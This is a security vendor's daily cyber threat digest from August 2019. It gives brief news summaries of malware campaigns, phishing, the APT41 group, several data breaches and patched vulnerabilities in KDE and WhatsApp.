Threat Reports

Silobreaker Daily Cyber Digest – 08 August 2019



Researchers publish analysis of password stealer Clipsa

  • Researchers at Avast analysed the multipurpose password stealer Clipsa, likely disguised as codec pack installers for media players that aim to trick victims into installing a malicious executable file that drops the malware. The highest infection attempts were observed in India, followed by the Philippines and Brazil.
  • Multiple functions were observed, including replacing victims’ cryptowallet addresses, so that victims send money to the threat actor’s wallet instead, searching and stealing wallet data files and installing a cryptocurrency miner.
  • Clipsa also uses infected devices to find vulnerable WordPress sites, after which it attempts brute-force attacks and sends valid login details to its C2. The researchers believe further data is then stolen by the threat actor and the infected sites may be used as secondary C2 servers.

Source (Includes IOCs)


URSNIF malware variant spread by malicious Word Document

  • Researchers at Fortinet discovered a new variant of URSNIF malware that is spread via an infected Word document containing malicious VBA code. If a target enables macros the malicious VBA code executes and runs a PowerShell code to connect to a URL and download URSNIF. The malware gathers information on a user’s system before sending it to the attacker’s C2.
  • The researchers stated that this campaign is still actively spreading. Fortinet’s reports include a comprehensive technical analysis of URSNIF. 

Source (Includes IOCs)                                   


Ongoing Campaigns

New Android spyware found in campaign connected to MoqHao

  • McAfee researchers discovered new Android malware targeting Japanese and Korean users, being distributed on Google Play Store. Although the malware’s characteristics and structures are different to MoqHao, also known as Roaming Mantis, the researchers found common spy commands and the same crash report key on cloud service as MoqHao, which suggests a connection to the MoqHao phishing campaign from 2017.
  • The campaign targets users using a phishing page related to a DNS hijacking attack, which tricks them into installing the spyware. Japanese users are targeted via two fake Japanese security applications and Korean users via a fake Korean police anti-spyware application on Google Play Store. 
  • Once installed, the spyware tries to collect device information, including IMEI and phone number and steal SMS and MMS messages. The fake Korean anti-spyware app also contains additional commands issued by the Tencent Push Service.
  • Google Play Store has since removed the applications, however the campaign is still ongoing.

Source (Includes IOCs)


Chinese news site used to deliver trojan

  • Researchers at Fortinet identified a campaign targeting users of an unnamed Chinese news site based in the US.  The unidentified attackers placed phishing links on the site which are capable of dynamically downloading scripts that can execute arbitrary JavaScript.
  • The attack begins by attempting to exploit the WinRAR vulnerability, CVE-2018-20250 and RTF flaw, CVE-2017-11882. Successful exploitation allows attackers to install a backdoor malware. 
  • The malware was first discovered in 2017 and collects system information, screenshots, process lists, and data from certain application. The bug can also be used to search files and download files. The researchers stated that the malware is still under development as evident by a continually expanding list of functionalities.  

Source (Includes IOCs)


Smominru cryptomining campaign now contains malware to steal access data 

  • Carbon Black researchers identified that the Smominru cryptomining campaign now features malware that allows attackers to steal system access information from infected users. So far Smominru has infected over 500,000 devices predominantly in the Asia Pacific region, Russia and Eastern Europe.  Researchers dubbed the inclusion of malware with cryptominers as an attack known as ‘access mining’. 
  • While the Smominru campaign previously only used a modified version of XMRig to perform Monero mining, it now also uses readily available malware and open source tooling, such as Mimikatz and ExternalBlue, which are modified to match the purposes of their campaign.
  • Furthermore, researchers found an unexpected link between Smominru and the MyKings botnet, at one point both shared an email address to register domains. The researchers stated that this shows that the threat actor is able to conduct multiple campaigns to perform access mining.

Source 1 Source 2


Fake DocuSign emails used in phishing campaign

  • Researchers at Cofense discovered a new phishing campaign targeting the credentials of all major email providers by sending emails pretending to be from the electronic signature technology DocuSign. The email originates from a domain hosted on the Germany-based hosting company Hetzner Online GmbH.
  • The fake DocuSign contains a link which redirects the victim to a phishing page containing login options for numerous known email providers. Once an option is clicked, the victim is redirected to the main phishing page.

Source (Includes IOCs)


Hacker Groups

FireEye publish deep-dive analysis of Chinese based APT41 group 

  • APT41 have been operational since 2014, targeting organizations in the healthcare, gaming, high tech, telecommunications, travel, and media sectors. Additionally, they have been recorded performing surveillance operations for the Chinese government. They are reportedly well resourced, and their state-sponsored espionage activity runs parallel to the organization’s financial activities.  
  • The group uses a wide variety of malware families and tools, some are shared with other Chinese APTs, others are publicly available, and some tools are unique to them. They tend to operate on Windows and Linux systems and frequently target victims with spear phishing emails. When a target system is compromised APT41 can quickly move through their victim’s network, and are also persistent and respond quickly to network defenders.  
  • They specialize in supply chain compromise, frequently stealing source code and digital certificates to sign their own malware.  The researchers concluded that APT41 are ‘creative, skilled, and well-resourced’.



Leaks and Breaches

Neoclinical exposes medical data of over 37,000 individuals

  • Researchers at UpGuard discovered an exposed MongoDB database belonging to Australia-based Neoclinic, a company that matches individuals with ongoing clinical trials, containing personal information of 37,170 users. The database was first discovered on July 1st, 2019, however it was not secured until July 26th, 2019.
  • The majority of affected individuals are in Australia and New Zealand. The exposed information included personal information, such as names, email addresses, addresses with coordinates, and dates of birth, as well as responses to questions and trials, which contain information on medical diagnoses, illicit drug use and treatments.



Unprotected database exposes data of 3.6 million Leadership for Educational Equity members

  • Security researcher Jeremiah Fowler discovered a non-password protected elastic database with 5.2 million documents belonging to the US nonprofit organization Leadership for Educational Equity. The database was first discovered on July 27th and public access was restricted on July 31st, 2019. It is unclear how long the database was exposed and whether it was accessed by unauthorized parties.
  • Exposed data included the personal details of roughly 3.6 million members, including names, addresses, genders, ethnic details, and more. No highly sensitive data, such as Social Security numbers or payment information, was exposed.



Truman Medical Centers hit with ransomware attack

  • Kansas City’s Truman Medical Centers suffered a ransomware attack on August 6th, 2019, which affected parts of its computer system. The hospital announced that it had agreed to pay ‘a small amount of ransom.’
  • The hospital also stated that patients’ personal health and financial information are stored on a separate system, meaning they have not been affected by the attack.



Two health vendors report separate data breaches

  • On June 20th, 2019, health vendors Medico and Amarin Pharma separately reported data breaches caused by misconfigured databases. Both breaches were secured on the same day of discovery.
  • The Medico data breach exposed approximately 14,000 documents dating from 2018 of individuals whose medical business was processed by Medico. The data included bank details, insurance information, Social Security numbers, prescription histories, account names and passwords, and more.
  • The Amarin Pharma data breach exposed full identifying information of approximately 78,000 patients. The data included patient names, contact information, the prescribing doctor, pharmacy information, insurance details, and more. The data was exposed since May 2nd, 2019 and data access or theft cannot be ruled out.



State Farm issue users with notice following successful credential stuffing attack

  • State Farm are in the process of informing impacted customers that a criminal breached an unconfirmed number of accounts in a credential stuffing attack.  The company stated that the first attack was detected on July 6th, 2019, and attacks continued sporadically until July 22nd, 2019. 
  • The company stated that the attacker confirmed usernames and passwords, but it is not known if these were used to log into any customer accounts. State Farm reset the passwords of users impacted by the attack.



Starbucks database exposes nearly 1 million financial records

  • On April 8th, 2019, researcher Eugene Lim discovered a critical SQL injection vulnerability that exposed nearly one million financial records that were stored in a Starbucks database. Exposed information included receipt, tax and payroll data. Lim was able to access the database by sending an XML-formatted HTTP payload request to the server.
  • Starbucks patched the exposed database on April 10th, 2019, the vulnerability was made public on August 6th, 2019.




KDE Framework zero-day vulnerability patched

  • KDE has patched the command injection vulnerability disclosed by security researcher Dominik Penner by removing the feature that allows shell commands as values in the KConfig files. The vulnerability was present in nearly all Linux distributions and could have been exploited with a specially crafted desktop file containing malicious code that executes when a user opens a folder.



WhatsApp decryption process allows attackers to spoof messages

  • Check Point researchers identified that WhatsApp uses ‘protobuf2 protocol’ to encrypt data. By converting the data to Json the researchers were able to manipulate parameters and  develop three manipulation methods in private and group chats.
  • The first attack uses the quote feature in group conversation to change the sender’s identity, the second attack allows the attacker to alter someone else’s reply in a group, and the final attack allows an attacker to send a public message to a user which appears as a private message.
  • WhatsApp fixed the third vulnerability but attackers are still able to exploit the first and second flaws.



General News

Security researcher claims Boeing 787 Dreamliner can be hacked

  • In September 2018, security researcher Ruben Santamarta discovered publicly accessible code on Boeing’s network for the Boeing 737 and Boeing 787.  Analysis of the code led Santamarta to claim that a hacker could access the 787 Dreamliner’s inflight entertainment system and move through the planes networks to compromise safety critical systems.
  • Santamarta admits that he does not have the evidence to fully support his claim. Boeing denied Santamarta’s claims and stated that they were ‘provocative’ and ‘irresponsible’.



Criminal attempts to blackmail Binance with customer data

  • On August 7th, 2019, Binance informed customers that a hacker claimed to have 10,000 photos of Binance Know Your Customer (KYC) data. Binance KYC data is used to verify customers and could include ID cards, driving licenses and face scans. The attacker is demanding that Binance pay them 300 bitcoin for the data.
  • The company refused to pay the ransom and the attacker began to leak data via Telegram. The hacker has also been in communication with CoinDesk who have seen the images and reported that they are related to a major Binance hack that occurred last year.
  • Binance stated that the images appear to be dated from February 2018, during which time a third-party vendor was handling data for KYC verifications.



The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

More News

  • Silobreaker Daily Cyber Digest – 20 November 2019

      Malware Malware-as-a-service Phoenix keylogger gains popularity with cybercriminals Researchers at Cybereason have identified keylogger malware, named Phoenix, which is gaining popularity among cybercriminals. ...
  • Silobreaker Daily Cyber Digest – 19 November 2019

        Malware New ACBackdoor targets Windows and Linux devices Researchers at Intezer identified a new backdoor, named ACBackdoor, which can be used to...
  • Silobreaker Daily Cyber Digest – 18 November 2019

      Malware NextCloud Linux Servers hit with new NextCry ransomware BleepingComputer and security researcher Michael Gillespie analysed a newly spotted malware, named NextCry, which...
View all News

Request a demo

Get in touch